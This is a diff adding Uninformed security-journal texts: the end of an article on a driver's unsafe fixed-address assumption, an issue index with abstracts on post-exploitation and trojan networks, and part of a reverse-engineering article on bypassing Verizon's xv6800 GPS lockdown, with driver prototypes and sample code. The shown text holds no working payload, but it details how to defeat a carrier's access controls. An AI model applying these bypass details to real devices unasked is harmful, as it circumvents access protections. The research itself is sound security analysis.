Inside this +image there is a portion of code that attempts to make reference to the +addresses 0x00020038 and 0x0002003C without doing any sort of probing and +locking or validation on the region it's requesting. If the region does not +exist or contains unexpected data, a blue screen is a sure thing. The actual +portion of the driver that makes this assumption can be found below: + +mov [ebp+var_4], eax +mov edx, 20000h <-- +mov [ebp+var_24], edx +movzx ecx, word ptr ds:dword_20035+3 <-- +shr ecx, 1 +mov [ebp+var_28], ecx +lea eax, [ecx-1] +mov [ebp+var_1C], eax +test eax, eax +jbe short loc_227CC +mov ebx, [edx+3Ch] <-- +cmp word ptr [ebx+eax*2], '\' + +The lines of intereste are marked by ``<--'' indicators pointing to the exact +instructions that result in a reference being made to an address that is +expected to be within a process' parameter information structure. For the sake +of investigation, one might wonder what it is that the driver could be +attempting to reference. To determine that, it is first necessary to dump the +format of the process parameter structure which, as stated previously, is +RTL_USER_PROCESS_PARAMETERS: + +RTL_USER_PROCESS_PARAMETERS: + +0x000 MaximumLength : Uint4B + +0x004 Length : Uint4B + +0x008 Flags : Uint4B + +0x00c DebugFlags : Uint4B + +0x010 ConsoleHandle : Ptr32 Void + +0x014 ConsoleFlags : Uint4B + +0x018 StandardInput : Ptr32 Void + +0x01c StandardOutput : Ptr32 Void + +0x020 StandardError : Ptr32 Void + +0x024 CurrentDirectory : _CURDIR + +0x030 DllPath : _UNICODE_STRING + +0x038 ImagePathName : _UNICODE_STRING + +0x040 CommandLine : _UNICODE_STRING + +0x048 Environment : Ptr32 Void + +0x04c StartingX : Uint4B + +0x050 StartingY : Uint4B + +0x054 CountX : Uint4B + +0x058 CountY : Uint4B + +0x05c CountCharsX : Uint4B + +0x060 CountCharsY : Uint4B + +0x064 FillAttribute : Uint4B + +0x068 WindowFlags : Uint4B + +0x06c ShowWindowFlags : Uint4B + +0x070 WindowTitle : _UNICODE_STRING + +0x078 DesktopInfo : _UNICODE_STRING + +0x080 ShellInfo : _UNICODE_STRING + +0x088 RuntimeData : _UNICODE_STRING + +0x090 CurrentDirectores : [32] _RTL_DRIVE_LETTER_CURDIR + +To determine the attribute that the driver is attempting to reference, one must +take the addresses and subtract them from the base address 0x00020000. This +produces two offsets: 0x38 and 0x3c. Both of these offsets are within the +ImagePathName attribute which is a UNICODE_STRING. The UNICODE_STRING structure +is defined as: + +UNICODE_STRING: + +0x000 Length : Uint2B + +0x002 MaximumLength : Uint2B + +0x004 Buffer : Ptr32 Uint2B + +This would mean that the driver is attempting to reference the path name of the +process' executable image. The 0x38 offset is the length of the image path +name and the 0x3c is the pointer to the image path name buffer that actually +contains the path. The reason that the driver would need to get access to the +executable path is outside of the scope of this discussion, but suffice to say +that the method on which it is based is an assumption that may not always be +safe to make, especially under conditions where the process' parameter +information is not mapped at 0x00020000. + + +3.3) The Solution + +The solution to this problem would be for ATI to come up with an alternate +means by which the process' image path name can be obtained. Possibilities for +alternate methods include referencing the PEB to obtain the address of the +process parameters (by using the ProcessParameters attribute of the PEB). 
This +approach is suboptimal because it requires that ATI attempt to reference fields +in a structure that is intended to be opaque and also readily changes between +versions of Windows. Another alternate approach, which is perhaps the most +feasible, would be to make use of the ProcessImageFileName PROCESSINFOCLASS. +This information class can be queried using the NtQueryInformationProcess +system call to populate a UNICODE_STRING that contains the full path to the +image that is associated with the handle that is supplied to +NtQueryInformationProcess. The nice thing about this is that it actually +indirectly uses the alternate method from the first proposal, but it does so +internally rather than forcing an external vendor to access fields of the PEB. + +Regardless of the actual solution, it seems obvious that assuming that a region +of memory will be mapped at a fixed address in every process is something that +ATI should not do. There are indeed cases where Windows itself requires +certain things to be mapped at the same address between one execution of a +process to the next, but it is the opinion of the author that ATI should not +assume things that Windows itself does not also assume. + + +4) Conclusion + +Though this document may appear as an attempt to make specific 3rd party +vendors look bad, that is not its intention. In fact, the author acknowledges +having been an antagonistic developer in the past. To that point, the author +hopes that by providing specific illustrations of where assumptions made by 3rd +parties can lead to problems, the reader will be more apt to consider potential +conditions that might become problematic if other applications attempt to +co-exist with ones that the reader may write in the future. + + +Bibliography + +Probert, David B. Windows Kernel Internals: Process Architecture. +http://www.i.u-tokyo.ac.jp/ss/lecture/new-documents/Lectures/13-Processes/Processes.ppt; +accessed April 04, 2005. diff --git a/uninformed/1.txt b/uninformed/1.txt new file mode 100644 index 0000000..57102cf --- /dev/null +++ b/uninformed/1.txt @@ -0,0 +1,43 @@ + + +Engineering in Reverse +Introduction to Reverse Engineering Win32 Applications +trew +During the course of this paper the reader will be (re)introduced to many concepts and tools essential to understanding and controlling native Win32 applications through the eyes of Windows Debugger (WinDBG). Throughout, WinMine will be utilized as a vehicle to deliver and demonstrate the functionality provided by WinDBG and how this functionality can be harnessed to aid the reader in reverse engineering native Win32 applications. Topics covered include an introductory look at IA-32 assembly, register significance, memory protection, stack usage, various WinDBG commands, call stacks, endianness, and portions of the Windows API. Knowledge gleaned will be used to develop an application designed to reveal and/or remove bombs from the WinMine playing grid. +code.tgz | pdf | html | txt + +Exploitation Technology +Post-Exploitation on Windows using ActiveX Controls +skape +When exploiting software vulnerabilities it is sometimes impossible to build direct communication channels between a target machine and an attacker's machine due to restrictive outbound filters that may be in place on the target machine's network. Bypassing these filters involves creating a post-exploitation payload that is capable of masquerading as normal user traffic from within the context of a trusted process. 
One method of accomplishing this is to create a payload that enables ActiveX controls by modifying Internet Explorer's zone restrictions. With ActiveX controls enabled, the payload can then launch a hidden instance of Internet Explorer that is pointed at a URL with an embedded ActiveX control. The end result is the ability for an attacker to run custom code in the form of a DLL on a target machine by using a trusted process that uses one or more trusted communication protocols, such as HTTP or DNS. +pdf | html | txt + +General Research +Smart Parking Meters +h1kari +Security through obscurity is unfortunately much more common than people think: many interfaces are built on the premise that since they are a "closed system" they can ignore standard security practices. This paper will demonstrate how parking meter smart cards implement their protocol and will point out some weaknesses in their design that open the doors to the system. It will also present schematics and code that you can use to perform these basic techniques for auditing almost any type of blackblox secure memory card. +html | txt + +General Security +Loop Detection +Peter Silberman +During the course of this paper the reader will gain new knowledge about previous and new research on the subject of loop detection. The topic of loop detection will be applied to the field of binary analysis and a case study will be given to illustrate its uses. All of the implementations provided in this document have been written in C/C++ using Interactive Disassembler (IDA) plug-ins. +code.tgz | pdf | html | txt + +Social Zombies: Aspects of Trojan Networks +warlord +Malicious code is so common in today's Internet that it seems impossible for an average user to keep his or her system clean. It's estimated that several hundred thousand machines are infected by trojans to be abused in a variety of ways, including the theft of money and confidential data as well as extortion, spam, and a whole plethora of further ways. Most often the infected hosts are linked into simple botnets to provide an easy way for the botnet manager to command his zombie army. This article describes ways to form far more effective networks than the ones in use today by the means of stealth, deception, and cryptography. +pdf | html | txt + +Machine Speak +Mac OS X PPC Shellcode Tricks +H D Moore +Developing shellcode for Mac OS X is not particularly difficult, but there are a number of tips and techniques that can make the process easier and more effective. The independent data and instruction caches of the PowerPC processor can cause a variety of problems with exploit and shellcode development. The common practice of patching opcodes at run-time is much more involved when the instruction cache is in incoherent mode. NULL-free shellcode can be improved by taking advantage of index registers and the reserved bits found in many opcodes, saving space otherwise taken by standard NULL evasion techniques. The Mac OS X operating system introduces a few challenges to unsuspecting developers; system calls change their return address based on whether they succeed and oddities in the Darwin kernel can prevent standard execve() shellcode from working properly with a threaded process. The virtual memory layout on Mac OS X can be abused to overcome instruction cache obstacles and develop even smaller shellcode. +pdf | html | txt + +What Were They Thinking? 
+Annoyances Caused by Unsafe Assumptions +skape +This installation of What Were They Thinking illustrates some of the annoyances that can be caused when developing software that has to inter-operate with third-party applications. Two such cases will be dissected and discussed in detail for the purpose of showing how third-party applications can fail when used in conjunction with software that performs certain tasks. The analysis of the two cases is meant to show how complex failure conditions can be analyzed and used to determine inter-operability problems. +pdf | html | txt + diff --git a/uninformed/10.1.txt b/uninformed/10.1.txt new file mode 100644 index 0000000..315c77c --- /dev/null +++ b/uninformed/10.1.txt @@ -0,0 +1,929 @@ +Can you find me now? - Unlocking the Verizon Wireless xv6800 (HTC Titan) GPS +10/2008 +Skywing +skywing_uninformed@valhallalegends.com + +0. Abstract + +In August 2008 Verizon Wireless released a firmware upgrade for their xv6800 +(rebranded HTC Titan) line of Windows Mobile smartphones that provided a number +of new features previously unavailable on the device on the initial release +firmware. In particular, support for accessing the device's built-in Qualcomm +gpsOne assisted GPS chipset was introduced with this update. However, Verizon +Wireless elected to attempt to lock down the GPS hardware on xv6800 such that +only applications authorized by Verizon Wireless would be able to access the +device's built-in GPS hardware and perform location-based functions (such as +GPS-assisted navigation). The mechanism used to lock down the GPS hardware is +entirely client-side based, however, and as such suffers from fundamental +limitations in terms of how effective the lockdown can be in the face of an +almost fully user-programmable Windows Mobile-based device. This article +outlines the basic philosophy used to prevent unauthorized applications from +accessing the GPS hardware and provides a discussion of several of the flaws +inherent in the chosen design of the protection mechanism. In addition, +several pitfalls relating to debugging and reverse engineering programs on +Windows Mobile are also discussed. Finally, an overview of several suggested +design alterations that would have mitigated some of the flaws in the current +GPS lock down system from the perspective of safeguarding the privacy of user +location data are also presented. + +1. Introduction + +The Verizon Wireless xv6800 (which is in and of itself a rebranded version of +the HTC Titan, with a carrier-customized firmware loadout) is a recently +released Windows Mobile-based smartphone. A firmware update released during +August 2008 enabled several new features on the device. For the purposes of +this article, the author has elected to focus on the embedded Qualcomm gpsOne +chipset, which provides assisted GPS facilities to applications running on the +device. + +With the official firmware upgrade (known as MR1), the assisted GPS support on +the device, which had previously remained inaccessible when using carrier- +supported firmware, was activated, albeit with a catch; only applications that +were approved by Verizon Wireless were able to access the built-in GPS hardware +present on the device. Although third-party applications could access an +externally connected (for example, Bluetooth-enabled) GPS device, the Qualcomm +gpsOne chipset embedded in the phone itself remained inaccessible. 
Coinciding with the public release of the xv6800 MR1 firmware, Verizon Wireless
+also began making available a subscription-based application (called "VZ
+Navigator"), which provides voice-based turn-by-turn navigation on the xv6800
+via the device's built-in GPS hardware.
+
+There have been a variety of third-party firmware images released for the
+xv6800 that mix-and-match portions of official firmware releases from other
+carriers supporting their own rebranded versions of the xv6800 (HTC Titan).
+Some of these custom firmware images enable access to the gpsOne hardware,
+albeit with several caveats. In particular, until recently, assisted GPS mode,
+wherein the cellular network aids the device in acquiring a GPS fix, was not
+available on Verizon Wireless's network with custom firmware images; only
+standalone GPS mode (which requires waiting for a "cold lock" on three GPS
+satellites, a process that may take many minutes after device boot) was
+enabled. In addition, installing these custom firmware images requires
+patching out a signature check in the software loader on the device. This
+procedure may be considered dangerous if one wishes to retain hardware
+warranty support (which may be desirable, given the steep unsubsidized cost of
+the device).
+
+Furthermore, should one install the official Verizon Wireless MR1 firmware
+upgrade, the gpsOne hardware on the device would remain locked down even if
+one switched to a currently available third-party firmware image. This is
+likely due to a sticky setting written to the firmware during the carrier
+provisioning process at the completion of the MR1 firmware upgrade. As the
+presently available third-party ROM images do not wipe the area of the
+device's firmware which seems to control the GPS hardware's lockdown state, it
+becomes difficult to unlock the GPS hardware after having upgraded to the MR1
+firmware image. A lengthy process is available to undo this change, but it
+involves the complete reset of most provisioning settings on the device, such
+that the phone must be partially manually reprovisioned, as opposed to
+utilizing the over-the-air provisioning support.
+
+Given the downsides of relying on custom firmware images for enabling the
+built-in GPS hardware on the xv6800, the official firmware release holds a
+reasonable attraction. However, the locking down of the GPS hardware to only
+Verizon Wireless authorized applications is undesirable should one wish to use
+third-party location-enabled applications with the built-in GPS hardware, such
+as Google Maps or Microsoft's Live Search.
+
+Verizon Wireless indicates that third-party application usage of the GPS
+hardware on their devices is subject to Verizon Wireless-dictated policies and
+procedures [1]. In particular, the security of user location information is
+often cited [2] as a reason for requiring location-enabled applications to be
+certified by Verizon Wireless. Unfortunately, the mechanism deployed to lock
+down the built-in GPS hardware on the xv6800 does very little to actually
+prevent third-party programs (malicious or otherwise) from accessing location
+information. In fact, given Windows Mobile 6's lack of "hard" process
+isolation, it is questionable whether it is even technically feasible to
+provide a truly secure protection mechanism on a device that allows
+user-supplied programs to be loaded and executed.
+
+While there may be golden intentions in attempting to protect users from
+malicious programs designed to harvest their location information on-the-fly,
+the protection system as implemented to control access to the gpsOne chipset
+on the xv6800 is unfortunately relatively weak. This is at odds with Verizon
+Wireless's stated goals of attempting to protect the security of a user's
+location information, and thus may place users at risk.
+
+2. Overview of Protection Mechanisms
+
+There are multiple levels of protection mechanisms built into both the MR1
+firmware image for the xv6800 and the GPS-enabled subscription VZ Navigator
+software that Verizon Wireless supports as the sole officially sanctioned
+location-based application (at the time of this article's writing). The
+protection mechanisms can be broken up into those that exist in the device
+firmware itself, and those that exist in the VZ Navigator software.
+
+2.1. Firmware-based Protection Mechanisms
+
+The MR1 firmware provides the underlying foundation of the built-in GPS
+hardware lockdown logic. There are several built-in software components that
+are "baked into" the firmware image and support the GPS lockdown system. The
+principal design underpinning the firmware-based protection system, however,
+is a fairly run-of-the-mill security-through-obscurity based approach. In
+particular, GPS location information obtained by the built-in gpsOne hardware
+(specifically, latitude and longitude) is encrypted. Only programs that
+understand how to decrypt the position information are able to make sense of
+any data returned by the gpsOne chipset.
+
+Furthermore, in order to initiate a location fix via the built-in gpsOne
+hardware, an application must continually respond correctly to a series of
+challenge-response interactions with the gpsOne chipset driver (and thus the
+radio firmware on the device). The reason for implementing both a
+challenge-response mechanism as well as obfuscating the actual GPS location
+will become apparent after further discussion.
+
+The firmware-based protected gpsOne interface has several constituent layers,
+with supporting code present at radio-firmware level, kernel driver level, and
+user mode application level.
+
+At the lowest level, the radio firmware for the device chipset would appear to
+have a hand in obfuscating returned GPS positioning data. This assumption is
+logically based on a strings dump of radio firmware images indicating the
+presence of AES-related calls in GPS-related code (AES is used to encrypt the
+returned location information), and the fact that switching to a custom
+firmware image after installing the MR1 update does not re-enable the
+plaintext gpsOne interface.
+
+Between the radio firmware (which executes outside the context of Windows
+Mobile) and the OS itself, there exists a kernel mode Windows Mobile driver
+known as the GPS intermediate driver. This module (gpsid_qct.dll) provides an
+interface between user mode callers and the GPS hardware on the device. It
+also provides support for multiplexing a single piece of GPS hardware across
+multiple user mode applications concurrently (a standard feature of Windows
+Mobile's GPS support). However, Verizon Wireless has broken this support with
+the locked down GPS logic that has been placed in the xv6800's implementation
+of the GPS intermediate driver.
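+
+For context, the fragment below is a minimal sketch -- not taken from any
+shipping application -- of how a typical Windows Mobile program consumes the
+multiplexed GPS intermediate driver through the stock gpsapi.dll interface
+documented in [4], [5], and [6]. It is this standard usage pattern that the
+locked down driver breaks, since the latitude and longitude values it returns
+are encrypted. The helper name QueryCurrentPosition and the polling style are
+illustrative choices only.
+
+#include <windows.h>
+#include <gpsapi.h>
+
+BOOL
+QueryCurrentPosition(
+    __out double *Latitude,
+    __out double *Longitude
+    )
+{
+    GPS_POSITION Position;
+    HANDLE       Device;
+    BOOL         Valid = FALSE;
+
+    //
+    // Open a handle to the GPS intermediate driver.  No event handles are
+    // supplied, so position data is polled rather than signaled.
+    //
+
+    Device = GPSOpenDevice( NULL, NULL, NULL, 0 );
+
+    if (Device == NULL)
+        return FALSE;
+
+    ZeroMemory( &Position, sizeof( Position ) );
+
+    Position.dwVersion = GPS_VERSION_1;
+    Position.dwSize    = sizeof( Position );
+
+    //
+    // Request the most recent fix, accepting data up to five seconds old.
+    //
+
+    if (GPSGetPosition( Device, &Position, 5000, 0 ) == ERROR_SUCCESS &&
+        (Position.dwValidFields & GPS_VALID_LATITUDE)  != 0           &&
+        (Position.dwValidFields & GPS_VALID_LONGITUDE) != 0)
+    {
+        *Latitude  = Position.dblLatitude;
+        *Longitude = Position.dblLongitude;
+        Valid      = TRUE;
+    }
+
+    GPSCloseDevice( Device );
+
+    return Valid;
+}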
+ +Beneath the GPS intermediate driver, there are two different interfaces that +are supported for the collection of location data on Windows Mobile-based +devices [4]. The first of these is an emulated serial port that is exposed to +user mode, and implements a standard NMEA-compatible text-based interface for +accessing location information. This interface has also been broken by the +GPS intermediate driver used by Verizon Wireless on the xv6800, for reasons +that will become clear upon further discussion. + +The second interface for retrieving location information via the GPS +intermediate driver is a set of IOCTLs implemented by the GPS intermediate +driver to retrieve parsed (binary) GPS data from the currently-active GPS +hardware (returned as C-style structures). User mode callers do not typically +call these IOCTLs directly from their code, but instead indirect through a set +of thin C API wrappers in a system-supplied module called gpsapi.dll. This +interface is also broken by the GPS lockdown logic in the GPS intermediate +driver, although an extended version of this IOCTL-based interface is used by +GPS-enabled applications that support the locked down mode of operation on the +xv6800. + +Verizon Wireless ships a custom module parallel to gpsapi.dll on the xv6800, +named oemgpsOne.dll. This module exports a superset of the APIs provided by +the standard gpsapi.dll (although there are slight differences in function +names). Additionally, new APIs (which are, as in gpsapi.dll, simply thin +wrappers around IOCTL requests sent to the GPS intermediate driver) are +provided to manage the challenge-response and encrypted GPS location aspects +of the gpsOne lockdown system present on the xv6800. Through correct usage of +the APIs exported by oemgpsOne.dll, a program with knowledge of the GPS lock +down system can retrieve valid positioning data from the gpsOne chipset on the +device. + +Applications that are approved by Verizon Wireless for location-enabled +operation make calls to a library developed by Verizon Wireless and Autodesk, +named LBSDriver.dll, which is itself a client of oemgpsOne.dll. LBSDriver.dll +and its security measures are discussed later, along with VZ Navigator. + +2.1.a. Application Authorization via Challenge-response + +In order to activate the gpsOne hardware on the xv6800 and request a GPS +location fix, an application must receive a challenge data block from the +gpsOne driver and perform a secret transform on the given data in order to +create a well-formed response. Until this process is completed, the gpsOne +hardware will not attempt to return a location fix. Furthermore, a +location-enabled application using the built-in gpsOne hardware must +continually complete additional challenge-response sequences (using the same +underlying algorithms) as it continues to acquire updated location fixes from +the gpsOne hardware. + +The first step in connecting to the GPS intermediate driver to retrieve valid +position information is to open a handle to a GPS intermediate driver instance. +This is accomplished with a call to an oemgpsOne.dll export by the name of +oGPSOpenDevice. The parameters and return value of this function are analogous +to the standard Windows Mobile GPSOpenDevice routine [5]. 
+ +HANDLE +oGPSOpenDevice( + __in HANDLE NewLocationData, + __in HANDLE DeviceStateChange, + __in const WCHAR *DeviceName, + __in DWORD Flags + ); + +After a handle to the GPS intermediate driver instance is available, the next +step in preparing for the challenge-response sequence is to issue a call to +a second function implemented by oemgpsOne.dll, named oGPSGetBaseSSD. +This routine returns a session-specific blob of data that is later used in the +challenge-response process. In the current implementation, the returned blob +appears to always contain the same data across every invocation. + +DWORD +oGPSGetBaseSSD( + __in HANDLE Device, + __out unsigned char *Buf, // sizeof = 0x10 + __out unsigned long *BufLength, // 0x10 + __out unsigned short *Buf2 // sizeof = 0x10 + ); + +Next, the GPS intermediate driver must be provided with a valid event handle to +signal when a new challenge cycle has been requested by the driver. This is +accomplished via a call to the oGPSEnableSecurity function in oemgpsOne.dll. + +DWORD +oGPSEnableSecurity( + __in HANDLE Device, + __in HANDLE SecurityChangeEvent + ); + +After the session-specific blob has been retrieved, and an event handle for +new challenge requests has been provided to the GPS intermediate driver, the +next step is to receive a challenge block from the GPS intermediate driver and +compute a valid response. The application must wait until the GPS intermediate +driver signals the challenge request event before requesting the current +challenge data block. Once the driver signals the event that was passed to +oGPSEnableSecurity, the application must execute one challenge-response cycle. + +Challenge data blocks are retrieved from the gpsOne driver via a call to a +routine exported from oemgpsOne.dll, named oGPSReadSecurityConfig. As per the +prototype, this routine takes a handle to the GPS intermediate driver instance, +and returns a blob of data used to generate a challenge response. + +DWORD +oGPSReadSecurityConfig( + __in HANDLE Device, + __out unsigned char *Buf // On return, 0x4 + 1 + 1 + Buf[0x6] (max length 0x1c total) + ); + +After the challenge data blob has been retrieved via a call to +oGPSReadSecurityConfig, the GPS lockdown-aware application must perform a +series of secret transformations on it before indicating a companion response +blob down to the GPS intermediate driver. The transformation function consists +of some bit-shuffling of the challenge blob, followed by a SHA-1 hash of the +shuffled challenge blob concatenated with the session-specific data blob. This +process yields the bulk of the response data less a two-byte header that is +prepended prior to indication down to the GPS intermediate driver. + +The process of sending the computed challenge-response is accomplished via a +call to another function in oemgpsOne.dll, by the name of +oGPSWriteSecurityConfig. + +DWORD +oGPSWriteSecurityConfig( + __in HANDLE Device, + __in unsigned char *Buf // 0x1C + ); + +The GPS intermediate driver will continue to periodically challenge the +application while it requests updated position fixes from the gpsOne chipset. +This is accomplished by signaling the event passed to oGPSEnableSecurity, which +indicates to the application that it should retrieve a new challenge and create +a new response, using the mechanism outlined above. + +2.1.b. 
Location Information Encryption + +Without passing the challenge-response scheme previously described, the GPS +intermediate driver will refuse to return a set of position information from +the gpsOne hardware. Even after the challenge-response system has been +implemented, however, a secondary layer of security must be addressed. This +security layer takes the form of the encryption of the latitude and longitude +values returned by the gpsOne chipset. + +While this second layer of security may appear superfluous at first glance, +there exists a valid reason for it. Recall that the GPS intermediate driver +multiplexes a single piece of GPS hardware across multiple applications. In +the implementation of the current GPS intermediate driver for the xv6800, the +challenge-response scheme appears to map directly to the gpsOne chipset itself. + +Thus, once a single program has passed the challenge-response mechanism, and as +long as that program continues to respond correctly to challenge-response +requests, any program on the system can call any of the standard Windows Mobile +GPS interfaces to retrieve location data. This presents the obvious security +hole wherein a Verizon Wireless-approved GPS application is started, and then a +third-party application using the standard Windows Mobile GPS API is loaded, +in effect "piggy-backing" on top of the challenge-response code residing in the +approved application to allow access to the embedded gpsOne hardware. + +For reasons unclear to the author, the designers of the GPS lockdown system +did not choose to simply disable GPS requests not associated with the program +that has passed the challenge-response scheme. Instead, a different approach +is taken, such that the GPS intermediate driver encrypts the location +information that it returns via either serial port or gpsapi.dll interfaces. + +In order to make sense of the returned latitude and longitude values, a program +must be able to decrypt them. While the GPS intermediate driver provides the +decryption key in plaintext equivalent to any program that knows how to request +it, this information is not available to clients of the standard Windows Mobile +NMEA-compatible virtual serial port or gpsapi.dll interfaces. Aside from +latitude and longitude data, however, all other information returned by the +standard Windows Mobile GPS interface is unadulterated and valid (this includes +altitude and timing information, primarily). + +Thus, the first step to decoding valid position values is to call an extended +version of the standard Windows Mobile GPSGetPosition routine [6]. This +extended routine is named oGPSGetPosition, and it, too, is implemented in +oemgpsOne.dll. The prototype matches that of the standard GPSGetPosition, +although an extended version of the GPS_POSITION structure containing +additional information (including a blob needed to derive the decryption key +required to decrypt the longitude and latitude values) is returned. + +DWORD +oGPSGetPosition( + __in HANDLE Device, + __out PGPS_POSITION GPSPosition, + __in DWORD MaximumAge, + __in DWORD Flags + ); + +Decryption of the latitude and longitude information is fairly straight- +forward, involving a transform (via the same transformation process described +previously) of the challenge data returned as a part of the extended +GPS_POSITION structure. This yields an AES key, which is imported into a +CryptoAPI key object, and then used in ECB mode to decrypt the latitude and +longitude values. 
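+
+The fragment below is a simplified sketch of this decryption step; it is not
+code lifted from LBSDriver.dll. The helper name DecryptCoordinateBlock, the
+assumption of a 16-byte derived key, and the use of the PROV_RSA_AES provider
+type are illustrative assumptions made here, relying only on the driver's
+apparent use of CALG_AES_128 through CryptoAPI.
+
+#include <windows.h>
+#include <wincrypt.h>
+
+static
+BOOL
+DecryptCoordinateBlock(
+    __in const BYTE *KeyData,     // 16-byte AES key derived from the challenge data
+    __inout BYTE *Coordinates,    // encrypted latitude/longitude, decrypted in place
+    __in DWORD CoordinatesLength  // multiple of the 16-byte AES block size
+    )
+{
+    struct
+    {
+        BLOBHEADER Header;
+        DWORD      KeyLength;
+        BYTE       Key[ 16 ];
+    } KeyBlob;
+
+    HCRYPTPROV Provider = 0;
+    HCRYPTKEY  Key      = 0;
+    DWORD      Mode     = CRYPT_MODE_ECB;
+    BOOL       Success  = FALSE;
+
+    //
+    // Build a PLAINTEXTKEYBLOB around the derived key material.
+    //
+
+    KeyBlob.Header.bType    = PLAINTEXTKEYBLOB;
+    KeyBlob.Header.bVersion = CUR_BLOB_VERSION;
+    KeyBlob.Header.reserved = 0;
+    KeyBlob.Header.aiKeyAlg = CALG_AES_128;
+    KeyBlob.KeyLength       = sizeof( KeyBlob.Key );
+
+    memcpy( KeyBlob.Key, KeyData, sizeof( KeyBlob.Key ) );
+
+    //
+    // Import the key, switch the key object into ECB mode, and decrypt the
+    // coordinate blocks in place (Final is FALSE, so no padding is removed).
+    //
+
+    if (CryptAcquireContext( &Provider, NULL, NULL, PROV_RSA_AES,
+                             CRYPT_VERIFYCONTEXT )                          &&
+        CryptImportKey( Provider, (BYTE *)&KeyBlob, sizeof( KeyBlob ), 0, 0,
+                        &Key )                                              &&
+        CryptSetKeyParam( Key, KP_MODE, (BYTE *)&Mode, 0 )                  &&
+        CryptDecrypt( Key, 0, FALSE, 0, Coordinates, &CoordinatesLength ))
+    {
+        Success = TRUE;
+    }
+
+    if (Key)
+        CryptDestroyKey( Key );
+    if (Provider)
+        CryptReleaseContext( Provider, 0 );
+
+    return Success;
+}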
+ +Once decryption is complete, a scaling factor is then applied to the resultant +coordinate values, in order to bring them in line with the unit system used by +the standard Windows Mobile GPS interfaces. + +2.2.b. VZ Navigator (Application-level) Protection Mechanisms + +While many parts of the GPS lockdown system are implemented by radio firmware- +level, or kernel mode-level code, portions are also implemented in user mode. +An approved Verizon Wireless application accesses location information by +calling through a module developed by Verizon Wireless and Autodesk, and named +LBSDriver.dll. In an approved application, it is the responsibility of +LBSDriver.dll to communicate with the GPS intermediate driver via +oemgpsOne.dll, and implement the challenge-response and position decryption +functionality. LBSDriver.dll then exports a subset of the standard Windows +Mobile gpsapi.dll (with several custom additions), for usage by approved +programs on the xv6800. + +Additionally, LBSDriver.dll implements a user-controlled privacy policy on top +of the gpsOne hardware. The user is allowed to specify at what times of day a +particular program can access location information, and whether the user is +prompted to confirm the request. The privacy policy configuration process is +driven via a dialog box (implemented and created by LBSDriver.dll) that is +shown on the device the first time an application runs, and subsequently via +a Verizon Wireless-operated web site [7]. Privacy policy settings are +obfuscated and stored in the registry, keyed off of a hash of the calling +program's main process image fully-qualified filename. + +Because LBSDriver.dll is a standard, loadable DLL, it is vulnerable to being +loaded by untrusted code. There are several defenses implemented by the +LBSDriver module which attempt to deter third-party programs that have not been +approved by Verizon Wireless from successfully loading LBSDriver.dll and +subsequently using it to access location information. + +The first such protection embedded into LBSDriver.dll is a digital signature +check on the main process executable corresponding to any program that attempts +to load LBSDriver.dll. This check is ultimately triggered when the +GPSOpenDevice export on LBSDriver.dll is called. Specifically, the calling +process module is confirmed to be signed by a custom certificate. If this is +not the case, then an error dialog is shown, and the GPSOpenDevice request is +denied. This check is based on calling GetModuleFileName(NULL, ...) [8] to +retrieve the path to the main process image, which is then run through the +aforementioned signature check. + +Additionally, LBSDriver.dll also connects to an Autodesk-operated server in +order to determine if the calling program is authorized to use LBSDriver.dll. +In addition to verifying that the calling program is approved as a GPS-enabled +application, the Autodesk-operated server also appears to indicate back to the +client whether or not the user's account has been provisioned for a +subscription location-enabled application, such as VZ Navigator. A program +hoping to utilize LBSDriver.dll must pass these checks in order to successfully +acquire a location fix using the built-in gpsOne hardware. + +The Autodesk-operated server also provides configuration information (such as +Position Determining Entity (PDE) addresses) that is later used in the assisted +GPS process. 
However, this configuration information appears to be more or +less static, at least for the critical portions necessary to enable assisted +GPS, and can thus be cached and reused by third-party programs without even +needing to go through the Autodesk server. + +3. Opening gpsOne on the xv6800 to Third-party Applications. + +Understanding the protection mechanisms that implement the locking down of the +built-in GPS hardware is only part of the battle to enable third-party +GPS-enabled programs to operate on the xv6800. Undocumented functions in +oemgpsOne.dll with no equivalent in the standard Windows Mobile gpsapi.dll, and +various quirks of Windows Mobile itself preclude a straightforward +implementation to unlock the GPS for third-party programs. + +Furthermore, third-party GPS-enabled programs are written to one (or commonly, +both) of the standard Windows Mobile GPS interfaces. Because these interfaces +are disabled on the xv6800, a solution to adapt third-party programs to the +locked down GPS interface would be required (in lieu of modifying every single +third-party application to support the locked down GPS interface). As many of +these third-party applications are closed-source and frequently updated, any +solution that required direct modification of a third-party program would be +untenable from a maintenance perspective. + +The solution chosen was to write an emulation layer for the standard Windows +Mobile gpsapi.dll interface, which translates standard gpsapi.dll function +calls into requests compatible with the locked down GPS interface. + +3.1. Examining gpsOne Driver Interactions + +The first step in implementing a layer to unlock the gpsOne hardware on the +xv6800 involves discovering the correct sequence of oemgpsOne.dll calls (and +thus calls to the GPS intermediate driver, as oemgpsOne.dll is merely a thin +wrapper around IOCTL requests to the GPS intermediate driver, for the most +part, with some minor exceptions). + +The standard way that this would be done on a Windows-based system would be to +run VZ Navigator under a debugger, but there exist several complications that +prevent this from being an acceptable solution for monitoring oemgpsOne.dll +requests. + +First, the assisted GPS functionality of the gpsOne hardware requires that the +device be connected to the cellular network, and operating with it as the +default gateway, as a connection to a carrier-supplied server (known as a +"Position Determining Entity", or PDE) must be made. The PDE servers that are +operated by Verizon Wireless are firewalled off from outside their network, and +in addition, it is possible that they use the IP address assigned to the user +making a request for location assistance purposes. + +Unfortunately, the debugger connection to a Windows Mobile-based device, for +all the Windows Mobile debuggers that the author had access to (IDA Pro 5.1 and +the Visual Studio 2005 debugger) require an ActiveSync link. While the +ActiveSync link is enabled, it supersedes the cellular link for data traffic. +Even when the computer on the other end of the ActiveSync link was connected to +the cellular network via a separate cellular modem, the GPS functionality did +not operate, due to an apparent check of whether the cellular link is the most- +precedent data link on the device. + +This means that observing much of the oemgpsOne.dll calls relating to position +fixes would not be possible with the standard debugging tools available. 
The solution that was implemented for this problem was to write a proxy DLL
+that exports every symbol exported by oemgpsOne.dll, logs the parameters of
+any such API calls, and then forwards them on to the underlying oemgpsOne.dll
+implementation (logging return values and out parameters after the actual
+implementation function in question returns).
+
+While potentially labor-intensive in terms of creating the proxy DLL, such a
+technique is relatively simple on Windows. The usual procedure for such a task
+would be to create the proxy DLL, place it in the directory containing the main
+process image of the program to be hooked, and then load the real DLL with a
+fully-qualified path name from inside the proxy DLL.
+
+Unfortunately, Windows Mobile does not allow two DLLs with the same base name
+to be loaded, even if a fully-qualified path is specified with a call to
+LoadLibrary. Instead, the first DLL that happens to have been loaded by any
+process on the entire system matching the requested base name is returned.
